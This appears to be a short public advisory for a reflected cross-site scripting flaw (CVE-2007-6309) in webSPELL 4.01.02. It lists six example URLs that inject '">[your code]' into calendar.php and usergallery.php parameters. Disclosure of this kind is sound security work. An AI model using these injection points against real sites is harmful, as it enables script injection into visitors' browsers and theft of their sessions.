
Topic: |
webSPELL 4.01.02 (calendar.php, usergallery.php) XSS Vulnerability |
Credit: |
Brainhead |
Date: |
2007.12.11 |
CWE: |
CWE-79 (Show similar)
|
CVE: |
CVE-2007-6309 (Show details)
Use CVE to see details like: - CVSS2, - Affected Software, - References |

| Risk |
Local |
| Remote |
| Low |
No |
| Yes |
###################
Autor: Brainhead
Type: XSS
Version: 4.01.02
Files: usergallery.php, calendar.php
Magic Quotes :off
###################
Examples:
http://site.tld/[PATH]/index.php?site=usergallery&action=upload&galleryI
D=">[your code]
http://site.tld/[PATH]/index.php?site=calendar&action=announce&upID=">[y
our code]
http://site.tld/[PATH]/index.php?site=calendar&action=announce&tag=">[yo
ur code]
http://site.tld/[PATH]/index.php?site=calendar&action=announce&month=">[
your code]
http://site.tld/[PATH]/index.php?site=calendar&action=announce&userID=">
[your code]
http://site.tld/[PATH]/index.php?site=calendar&action=announce&year=">[y
our code]
[ ASCII VERSION ]
|